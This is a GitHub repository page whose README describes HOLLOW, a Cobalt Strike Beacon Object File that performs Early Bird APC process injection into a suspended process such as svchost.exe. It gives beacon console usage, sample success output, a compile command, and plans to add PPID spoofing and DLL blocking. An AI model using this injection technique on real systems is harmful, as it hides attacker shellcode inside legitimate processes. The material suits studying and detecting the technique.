Skip to content
/ HOLLOW Public

EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

License

Notifications You must be signed in to change notification settings

boku7/HOLLOW

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

HOLLOW - Cobalt Strike BOF

Authors:

Beacon Object File (BOF) that spawns an arbitrary process from beacons memory in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode; using the Early Bird injection method taught by @SEKTOR7net in RED TEAM Operator: Malware Development Intermediate.

Run from Cobalt Strike Beacon Console

  • After compile import the hollow.cna script into Cobalt Strikes Script Manager
beacon> help hollow
Synopsis: hollow /path/to/hollow/pe /local/path/to/shellcode.bin
beacon> hollow svchost.exe /Users/bobby.cooke/popCalc.bin
[*] HOLLOW - EarlyBird Remote Process Shellcode Injector (@0xBoku|github.com/boku7) | (@JTHam0|github.com/Rodion0)
[*]             (@n00bRage|github.com/josephkingstone) | (@OakTree__|github.com/git-oaktree)
[*] Reading shellcode from: /Users/bobby.cooke/popCalc.bin
[+] Success - Spawned process for svchost.exe at 5464 (PID)
[+] Success - Allocated RE memory in remote process 5464 (PID) at: 0x000001A83BEC0000
[+] Success - Wrote 280 bytes to memory in remote process 5464 (PID) at 0x000001A83BEC0000
[+] Success - APC queued for main thread of 5464 (PID) to shellcode address 0x000001A83BEC0000
[+] Success - Your thread was resumed and your shellcode is being executed within the remote process!

Compile with x64 MinGW (only tested from macOS):

x86_64-w64-mingw32-gcc -c hollow.x64.c -o hollow.x64.o

To Do List

  • Refactor code to make it more modular/clean
  • Implement this into github.com/boku7/SPAWN
    • Combine this with the PPID spoofing and blockdll features of SPAWN

Credits / References

  • Credit/shoutout to: @SEKTOR7net + Raphael Mudge
Sektor7 Malware Dev Essentials course - learned how to do the early bird injection technique
Raphael Mudge - Beacon Object Files - Luser Demo
Cobalt Strike - Beacon Object Files
BOF Code References

About

EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages